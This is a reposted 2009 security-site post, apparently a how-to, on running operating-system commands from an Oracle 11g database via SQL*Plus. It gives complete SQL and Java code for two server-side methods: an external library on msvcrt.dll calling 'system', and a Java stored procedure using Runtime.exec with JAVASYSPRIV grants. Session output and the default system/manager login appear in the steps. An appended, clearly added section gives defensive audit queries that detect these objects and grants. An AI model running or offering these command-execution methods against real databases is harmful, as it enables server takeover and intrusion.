Oracle implementation of cmd - Vulnerability warning - The Black Bar Safety Net

ID MYHACK58:62200922770
Type myhack58
Reporter Anonymous
Modified 2009-04-03T00:00:00


I installed Oracle DB 11g and wanted to try the methods circulating online for executing cmd commands from sqlplus. I don't know why, but it did not go well; the versions online may have been passed along incorrectly. However, there is a simple way to run cmd commands:

SQL> host net user

User accounts for \\PC-ATQHJ4UG1SDA

----------------------------------------------------------------------------
vmware_user              admin                    Administrator
ASPNET                   Guest                    IUSR_PC-ATQHJ4UG1SDA
IWAM_PC-ATQHJ4UG1SDA     SUPPORT_388945a0
The command completed successfully.

On Unix or Linux, use:

! command


Two other methods found online:

1. The first is to use msvcrt.dll

Write a file c:\orac.sql


Rem
Rem oracmd.sql
Rem
Rem Run system commands via Oracle database servers
Rem
Rem Bugs to
Rem
CREATE OR REPLACE LIBRARY exec_shell AS
'C:\windows\system32\msvcrt.dll';
/
show errors
CREATE OR REPLACE PACKAGE oracmd IS
PROCEDURE exec (cmdstring IN CHAR);
end oracmd;
/
show errors
CREATE OR REPLACE PACKAGE BODY oracmd IS
PROCEDURE exec(cmdstring IN CHAR)
IS EXTERNAL
NAME "system"
LIBRARY exec_shell
LANGUAGE C;
end oracmd;
/
show errors

Then:

C:\>sqlplus /nolog
SQL*Plus: Release - Production on Thu Jun 7 14:25:38 2001
(c) Copyright 2000 Oracle Corporation. All rights reserved.
SQL> connect system/manager@orcl (username, password and SID, respectively)
Connected.
SQL> @c:\orac.sql
Library created.
No errors.
Package created.
No errors.
Package body created.
No errors.
SQL>
SQL> exec oracmd.exec('dir > c:\oracle.txt');

On my machine the result was:

Error at line 1:
ORA-28595: Extproc agent: DLL path is invalid
ORA-06512: at "SYSTEM.ORACMD", line 2
ORA-06512: at line 1

It did not succeed.

The second method


create or replace and compile java source named "util" as
import java.io.*;
import java.lang.*;
public class util extends Object
{
  public static int RunThis(String args)
  {
    Runtime rt = Runtime.getRuntime();
    int RC = -1;
    try
    {
      Process p = rt.exec(args);
      int bufSize = 4096;
      BufferedInputStream bis = new BufferedInputStream(p.getInputStream(), bufSize);
      int len;
      byte buffer[] = new byte[bufSize];
      // Echo back what the program spit out
      while ((len = bis.read(buffer, 0, bufSize)) != -1)
        System.out.write(buffer, 0, len);
      RC = p.waitFor();
    }
    catch (Exception e) { e.printStackTrace(); RC = -1; }
    finally { return RC; }
  }
}
/

create or replace function RUN_CMz(p_cmd in varchar2) return number
as language java
name 'util.RunThis(java.lang.String) return integer';
/

create or replace procedure RC(p_cmd in varChar)
as
  x number;
begin
  x := RUN_CMz(p_cmd);
end;
/

After logging in, the steps are again executed in sequence:

SQL> @c:\1.sql
/
variable x number;

set serveroutput on;

exec dbms_java.set_output(100000);

grant javasyspriv to system;

grant javauserpriv to system;

The online method does not have this line; without it I could not succeed, and with it added it works.

exec :x:=run_cmz('ipconfig');

The command runs successfully.

The test environment is win2003+oracle11g
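
The following audit queries are an added example, not part of the original post. They look in the data dictionary for the objects and grants that the two methods above leave behind. They assume an account that can read the DBA_* views; the file-name patterns in the first query are assumptions to adjust per platform.

```sql
-- Added audit example (not from the original post). Run as a DBA.
-- Oracle-shipped objects will also be listed; compare against a known baseline.

-- 1. External libraries (method 1): every LIBRARY object backed by a file.
--    Flags C runtime libraries such as the msvcrt.dll used above.
SELECT owner, library_name, file_spec, status,
       CASE WHEN REGEXP_LIKE(file_spec, 'msvcrt|libc\.|kernel32', 'i')
            THEN 'C RUNTIME' ELSE 'REVIEW' END AS note
  FROM dba_libraries
 WHERE file_spec IS NOT NULL
 ORDER BY owner, library_name;

-- 2. Accounts and roles that are allowed to create such libraries.
SELECT grantee, privilege, admin_option
  FROM dba_sys_privs
 WHERE privilege IN ('CREATE LIBRARY', 'CREATE ANY LIBRARY')
 ORDER BY grantee;

-- 3. Java roles (method 2): who holds JAVASYSPRIV or JAVAUSERPRIV.
SELECT grantee, granted_role, admin_option
  FROM dba_role_privs
 WHERE granted_role IN ('JAVASYSPRIV', 'JAVAUSERPRIV')
 ORDER BY grantee, granted_role;

-- 4. Stored Java sources that start operating-system processes.
SELECT owner, name, line, text
  FROM dba_source
 WHERE type = 'JAVA SOURCE'
   AND REGEXP_LIKE(text, 'Runtime|ProcessBuilder|\.exec\s*\(', 'i')
 ORDER BY owner, name, line;

-- 5. PL/SQL call specifications that wrap Java or external C routines,
--    such as RUN_CMz and oracmd.exec above.
SELECT owner, name, type, line, text
  FROM dba_source
 WHERE type IN ('FUNCTION', 'PROCEDURE', 'PACKAGE BODY')
   AND REGEXP_LIKE(text, 'language\s+(java|c)\b|is\s+external', 'i')
 ORDER BY owner, name, line;
```

The `host` and `!` commands run on the SQL*Plus client machine rather than inside the database, so they leave nothing in these views.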